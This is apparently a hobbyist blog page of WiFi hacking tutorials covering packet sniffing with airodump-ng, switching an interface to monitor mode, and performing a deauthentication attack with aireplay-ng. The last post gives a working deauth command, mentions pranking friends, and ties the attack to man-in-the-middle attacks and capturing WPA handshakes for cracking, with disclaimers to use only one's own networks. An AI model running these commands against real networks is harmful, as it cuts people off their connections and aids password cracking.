Taylor Jolin

Hacker | Musician | Innovator | Dreamer

Category: WiFi

28May

Packet Sniffing with Airodump-ng

Airodump-ng is part of the Airocrack-ng suite. It is a packet sniffer designed to capture packets while in monitor mode.

DISCLAIMER: As I have said before, I am not responsible if you choose to do something stupid and get yourself arrested. Hack legally and hack friendly!

How to use Airodump-ng

  1. First we must enable monitor mode on our interface. If you do not know how, read through this.
  2. Next, enter the following command to begin the program: airodump-ng INTERFACE_NAME
    NOTE: This program will run until you force it to quit.

Now analyze the data you retrieve. You will see a list of BSSIDs or Network Names.

Below is a list and explanation of what you will see.

BSSIDPWRBeacons# Data# /sCHMBENCCipherAuthESSID
Nodes MAC AddressSignal StrenghFrames sent by network to broadcast its existanceNumber of Data packetsNumber of packets collect in past 10 secondsChannel network broadcasts onMaximum Bandwidth SupportedEncryption TypeCipher used in network encryptionAuthentication used in networkName of network

NOTE: The best adapter to use to sniff packets across networks is the Alfa Network AWUS036AC* series. The one I am using is the AWUS036ACS, which is small and fits neatly into my bag. I also have a multitude of antennas to use for wireless sniffing.

How to listen to 5 Ghz channels

By default, Airodump-ng only listens to 2.4 Ghz channels, so to enable the 5 Ghz scanning do the following:

  1. Start Airodump-ng by using the band argument: airodump-ng --band a INTERFACE_NAME

You can also specify multiple bands using the band argument. For example;
airodump-ng --band abg INTERFACE_NAME

NOTE: Your wireless card needs to support this feature. Also keep in mind that this requires a great deal of power and slows resources.

28May

How to enter Monitor Mode for WiFi Hacking

Monitor mode allows you to sniff packets and capture them in real time. Using a program such as Wireshark, you can then rebuild and analyze these packet captures.

  1. First check the status of the wireless and see what mode it is in using: iwconfig
  2. Next we must disable our selected interface using: ifconfig INTERFACE-NAME down
  3. This step may be optional, but in most cases you will want to kill tasks that could be a detriment to the packet capture. Do this using: airmon-ng check kill
    • NOTE: Running the previous command will display some suggested apps to kill prior to running the capture. To kill these apps use: kill PID
  4. Now we will enable monitor mode. To do so use the following: iwconfig INTERFACE_NAME mode monitor
  5. Finally, you must re-enable the interface using: ifconfig INTERFACE_NAME up
  6. Test to make sure you are in monitor mode using: iwconfig
27May

How to perform a WiFi De-authentication Attack

This is an old one but a fun one. I love doing this in my test environment and I have a lot of fun using this to prank my friends that choose to connect to it.

DISCLAIMER: Do not perform this attack on any network that you do not own. I am not responsible for any illegal use of this attack.

Now, I am assuming that you already know the basics of aircrack-ng and it’s suite of products.

This attack allows us to disconnect any device from any network.

  • Works on encrypted networks (WEP, WPA & WPA2)
  • No need to know the network key
  • No need to connect to the network

In order to do this, us the following:
aireplay-ng --deauth [#DeauthPackets] -a [NetworkMac] -c [TargetMac] [Interface]

For example
aireplay-ng --deauth 100000000 -a 00:11:22:33:44:55 -c 55:66:77:88:99:00 mon0

NOTE: In some cases you must run Airodump-ng in order to run this command. Run it in another thread or terminal using:
airodump-ng --bssid 00:11:22:33:44:55 --channel 2 mon0

This trick is handy with social engineering cases and Man In the Middle attacks. You can also use this to capture the handshake, which is used for WPA cracking.